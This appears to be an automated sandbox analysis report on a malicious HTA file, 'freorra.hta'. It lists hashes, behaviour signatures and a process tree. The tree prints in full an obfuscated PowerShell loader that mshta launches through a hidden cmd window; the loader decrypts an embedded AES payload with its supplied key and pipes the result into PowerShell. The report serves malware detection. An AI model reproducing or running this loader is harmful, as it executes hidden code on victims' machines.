Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
25-01-2024 13:56
Static task
static1
Behavioral task
behavioral1
Sample
freorra.hta
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
freorra.hta
Resource
win10v2004-20231215-en
General
-
Target
freorra.hta
-
Size
1.1MB
-
MD5
b46fee5771193152ad4e92a2bd75436d
-
SHA1
5ebc0363b9cfede7ce711e59b9c7bfbe7188a9d1
-
SHA256
ab6492900c66882416208e9554d85504ad7f7fe6e9674945887bc6ac47ebfdbd
-
SHA512
8125952c8a04a908d8245da32c77f0a5f6d5e60a925311deb4f24419cf6cd849d36e93e33505a2da2a07672148fd260409d4b34b8e2d49c6120abd27f2ca1e36
-
SSDEEP
1536:87it7MAZeK2PbPqFBQ04r76oogc2KQ1GLXETTtjIm+lIWFkKI5nPz3iQYgol7VS0:Si6AZr2PbPmBQhru1biXk
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1580 powershell.exe 1580 powershell.exe 1580 powershell.exe 2644 powershell.exe 2648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 2648 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
mshta.exepowershell.execmd.exedescription pid process target process PID 1752 wrote to memory of 1580 1752 mshta.exe powershell.exe PID 1752 wrote to memory of 1580 1752 mshta.exe powershell.exe PID 1752 wrote to memory of 1580 1752 mshta.exe powershell.exe PID 1752 wrote to memory of 1580 1752 mshta.exe powershell.exe PID 1580 wrote to memory of 2788 1580 powershell.exe cmd.exe PID 1580 wrote to memory of 2788 1580 powershell.exe cmd.exe PID 1580 wrote to memory of 2788 1580 powershell.exe cmd.exe PID 1580 wrote to memory of 2788 1580 powershell.exe cmd.exe PID 2788 wrote to memory of 2644 2788 cmd.exe powershell.exe PID 2788 wrote to memory of 2644 2788 cmd.exe powershell.exe PID 2788 wrote to memory of 2644 2788 cmd.exe powershell.exe PID 2788 wrote to memory of 2644 2788 cmd.exe powershell.exe PID 2788 wrote to memory of 2648 2788 cmd.exe powershell.exe PID 2788 wrote to memory of 2648 2788 cmd.exe powershell.exe PID 2788 wrote to memory of 2648 2788 cmd.exe powershell.exe PID 2788 wrote to memory of 2648 2788 cmd.exe powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\freorra.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $TXrH = 'AAAAAAAAAAAAAAAAAAAAALgoMIpXuiI6hGAhDsh3cJWwBb7QNE/LADXObYijVjWtxjRg/erskurYB0bHeZOKqF4CFw8yxVGBj/V854KAZi45qjmxBh8Sp7nADYvtuZg5JvdH9DB453dLjjhbpYt1TbWvJABEbgfBx984MdG2Y31vv1vvjYenwcGn2aGBbJlsc8ZTNIfpu3FbQPC0+PbcUZZNXwArWzvi2ekld3wnfv0FQwUphxilv3W2KnLGcJ28FeOz263ZcPelR3I94DxsGQn+WUTLDAkce5K77G7oV1DtOdnypYcIu+7D4caMvuhiywazKzCz4coAy05LrxwogHYTxQSxnV1VDoPbko4J5fAnfz8S7GPbs7QP0QpZUiyWojTvOXkVJjmyAAFv052kHslxkYz5IHdiLLgy1x97fI8UmN/8k5m1P4UvNtshcnu+9AHkYUW0q+pTFS7j1/zbyIdXkDB60nXKIvClOUZ4kuIM64ykKTLxDu9BPX7zEsaQ9kbEUCja3MLsffMuTsVFndQGah4WlH6dSSZUbU6KGnH9+PIx1YeKzpkUQuyzK8bxrsyST3QfEqzMktkt8KkEX0NcBE8ZzL+eWSCPTgZNjiKVSYNaQ2/7jUVd+ZRvdX4SN1pDXlfCPxOHNsbTKlbCBLkNT6LpF8IlhBciDnBFqdoB8Ai/oAn8+bQUi44AQgAFso2d0PWok5578jGnbGVb5mpBxe64to+dNLBvysTQRSSH8YuyvS0fU2sNXkgu1w/BFxyTTXE6xoMDmE3FzclKVE2SJjOjljZEqtN+HploPSJLUHzdwAAxF+QdFzYLAHhBJvVTyXwCj47cNIFzIYJ11p45L1t4TtnMrPRf4ebqCyM8zU7W1Ot4wmEfJQeydAkaQdQLq7g/nWO2EQpNCMOZWHjaU16WhPM7rEFWr2EtNAscFkSA2hLokAt8TsVE9KDS+B7O29zBh+NI53ykRWgPn0168OPztlvljgCbma3Xy3HkLtWxsoJ42L8NzT16vKahO/sRCfGckm1y10bH2LtaIS5wVHpOV6wkvC7UM4Qwebp0IEDRbLJ7SMe1LHX91xlPzthqvN7q5yOdMt8kYl2+kI4a3wBPHKfCrwaoX3Gx8+QYg2quKy3GpQNuAQhZn0vaQbJbbsZf2ERD0Jgp3BiKKfKvZ3H6MV4lIcu99w+MI7vQEM1nn1Y5Pfij1PdnGm6RNqPnlW/gY37EZSlqaUPZE2YlFT2SD41rqzSQ/O2RErCj6DTOa1we6UT0y1RtZI0/SYvyRyPJJSV16ppu6K8JTuTephe/UuuyXC06nACft+1jc/NgDqxCLL85NCNp5KanqLiIyIMcOitJe34VpFkw+K+4kTvlabUucxlKGU4Oj1wlXDGcUOIwCfspI17dJTGhIwlofVWr8D4+Ui+iUrDK7tlJTvTwCSf3zIwdvhOMkt37MGOGgMa1ClgiuCzvTnjpRyoxjfN/4EWhDsqmWUv5pJATyiSL1sHmdGr6UoOwAG2Tf8vCRXcJsPeDguyaa5Ff56cjjaNnuJ6PaKkmQPDrhrAndL0u4+cdwCXIENm2W9s=';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS | powershell - }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $TXrH = 'AAAAAAAAAAAAAAAAAAAAALgoMIpXuiI6hGAhDsh3cJWwBb7QNE/LADXObYijVjWtxjRg/erskurYB0bHeZOKqF4CFw8yxVGBj/V854KAZi45qjmxBh8Sp7nADYvtuZg5JvdH9DB453dLjjhbpYt1TbWvJABEbgfBx984MdG2Y31vv1vvjYenwcGn2aGBbJlsc8ZTNIfpu3FbQPC0+PbcUZZNXwArWzvi2ekld3wnfv0FQwUphxilv3W2KnLGcJ28FeOz263ZcPelR3I94DxsGQn+WUTLDAkce5K77G7oV1DtOdnypYcIu+7D4caMvuhiywazKzCz4coAy05LrxwogHYTxQSxnV1VDoPbko4J5fAnfz8S7GPbs7QP0QpZUiyWojTvOXkVJjmyAAFv052kHslxkYz5IHdiLLgy1x97fI8UmN/8k5m1P4UvNtshcnu+9AHkYUW0q+pTFS7j1/zbyIdXkDB60nXKIvClOUZ4kuIM64ykKTLxDu9BPX7zEsaQ9kbEUCja3MLsffMuTsVFndQGah4WlH6dSSZUbU6KGnH9+PIx1YeKzpkUQuyzK8bxrsyST3QfEqzMktkt8KkEX0NcBE8ZzL+eWSCPTgZNjiKVSYNaQ2/7jUVd+ZRvdX4SN1pDXlfCPxOHNsbTKlbCBLkNT6LpF8IlhBciDnBFqdoB8Ai/oAn8+bQUi44AQgAFso2d0PWok5578jGnbGVb5mpBxe64to+dNLBvysTQRSSH8YuyvS0fU2sNXkgu1w/BFxyTTXE6xoMDmE3FzclKVE2SJjOjljZEqtN+HploPSJLUHzdwAAxF+QdFzYLAHhBJvVTyXwCj47cNIFzIYJ11p45L1t4TtnMrPRf4ebqCyM8zU7W1Ot4wmEfJQeydAkaQdQLq7g/nWO2EQpNCMOZWHjaU16WhPM7rEFWr2EtNAscFkSA2hLokAt8TsVE9KDS+B7O29zBh+NI53ykRWgPn0168OPztlvljgCbma3Xy3HkLtWxsoJ42L8NzT16vKahO/sRCfGckm1y10bH2LtaIS5wVHpOV6wkvC7UM4Qwebp0IEDRbLJ7SMe1LHX91xlPzthqvN7q5yOdMt8kYl2+kI4a3wBPHKfCrwaoX3Gx8+QYg2quKy3GpQNuAQhZn0vaQbJbbsZf2ERD0Jgp3BiKKfKvZ3H6MV4lIcu99w+MI7vQEM1nn1Y5Pfij1PdnGm6RNqPnlW/gY37EZSlqaUPZE2YlFT2SD41rqzSQ/O2RErCj6DTOa1we6UT0y1RtZI0/SYvyRyPJJSV16ppu6K8JTuTephe/UuuyXC06nACft+1jc/NgDqxCLL85NCNp5KanqLiIyIMcOitJe34VpFkw+K+4kTvlabUucxlKGU4Oj1wlXDGcUOIwCfspI17dJTGhIwlofVWr8D4+Ui+iUrDK7tlJTvTwCSf3zIwdvhOMkt37MGOGgMa1ClgiuCzvTnjpRyoxjfN/4EWhDsqmWUv5pJATyiSL1sHmdGr6UoOwAG2Tf8vCRXcJsPeDguyaa5Ff56cjjaNnuJ6PaKkmQPDrhrAndL0u4+cdwCXIENm2W9s=';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS | powershell -3⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $TXrH = 'AAAAAAAAAAAAAAAAAAAAALgoMIpXuiI6hGAhDsh3cJWwBb7QNE/LADXObYijVjWtxjRg/erskurYB0bHeZOKqF4CFw8yxVGBj/V854KAZi45qjmxBh8Sp7nADYvtuZg5JvdH9DB453dLjjhbpYt1TbWvJABEbgfBx984MdG2Y31vv1vvjYenwcGn2aGBbJlsc8ZTNIfpu3FbQPC0+PbcUZZNXwArWzvi2ekld3wnfv0FQwUphxilv3W2KnLGcJ28FeOz263ZcPelR3I94DxsGQn+WUTLDAkce5K77G7oV1DtOdnypYcIu+7D4caMvuhiywazKzCz4coAy05LrxwogHYTxQSxnV1VDoPbko4J5fAnfz8S7GPbs7QP0QpZUiyWojTvOXkVJjmyAAFv052kHslxkYz5IHdiLLgy1x97fI8UmN/8k5m1P4UvNtshcnu+9AHkYUW0q+pTFS7j1/zbyIdXkDB60nXKIvClOUZ4kuIM64ykKTLxDu9BPX7zEsaQ9kbEUCja3MLsffMuTsVFndQGah4WlH6dSSZUbU6KGnH9+PIx1YeKzpkUQuyzK8bxrsyST3QfEqzMktkt8KkEX0NcBE8ZzL+eWSCPTgZNjiKVSYNaQ2/7jUVd+ZRvdX4SN1pDXlfCPxOHNsbTKlbCBLkNT6LpF8IlhBciDnBFqdoB8Ai/oAn8+bQUi44AQgAFso2d0PWok5578jGnbGVb5mpBxe64to+dNLBvysTQRSSH8YuyvS0fU2sNXkgu1w/BFxyTTXE6xoMDmE3FzclKVE2SJjOjljZEqtN+HploPSJLUHzdwAAxF+QdFzYLAHhBJvVTyXwCj47cNIFzIYJ11p45L1t4TtnMrPRf4ebqCyM8zU7W1Ot4wmEfJQeydAkaQdQLq7g/nWO2EQpNCMOZWHjaU16WhPM7rEFWr2EtNAscFkSA2hLokAt8TsVE9KDS+B7O29zBh+NI53ykRWgPn0168OPztlvljgCbma3Xy3HkLtWxsoJ42L8NzT16vKahO/sRCfGckm1y10bH2LtaIS5wVHpOV6wkvC7UM4Qwebp0IEDRbLJ7SMe1LHX91xlPzthqvN7q5yOdMt8kYl2+kI4a3wBPHKfCrwaoX3Gx8+QYg2quKy3GpQNuAQhZn0vaQbJbbsZf2ERD0Jgp3BiKKfKvZ3H6MV4lIcu99w+MI7vQEM1nn1Y5Pfij1PdnGm6RNqPnlW/gY37EZSlqaUPZE2YlFT2SD41rqzSQ/O2RErCj6DTOa1we6UT0y1RtZI0/SYvyRyPJJSV16ppu6K8JTuTephe/UuuyXC06nACft+1jc/NgDqxCLL85NCNp5KanqLiIyIMcOitJe34VpFkw+K+4kTvlabUucxlKGU4Oj1wlXDGcUOIwCfspI17dJTGhIwlofVWr8D4+Ui+iUrDK7tlJTvTwCSf3zIwdvhOMkt37MGOGgMa1ClgiuCzvTnjpRyoxjfN/4EWhDsqmWUv5pJATyiSL1sHmdGr6UoOwAG2Tf8vCRXcJsPeDguyaa5Ff56cjjaNnuJ6PaKkmQPDrhrAndL0u4+cdwCXIENm2W9s=';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD50b7dab35f977016b2b725f7005801194
SHA14ca9989d74b78d42f939155b18aa6248201169fe
SHA256ac727e1be9d2b2f38b5c320626e10f285f18ea6a593709b80468e6b8de6cb529
SHA5123ecb964a6add764b98b168036178de0ed4fd5d1350bb62cd0ecf961d4e524292a3618761139998261ff68082f5c97a33126f8ba690c540f70de56567c6d75399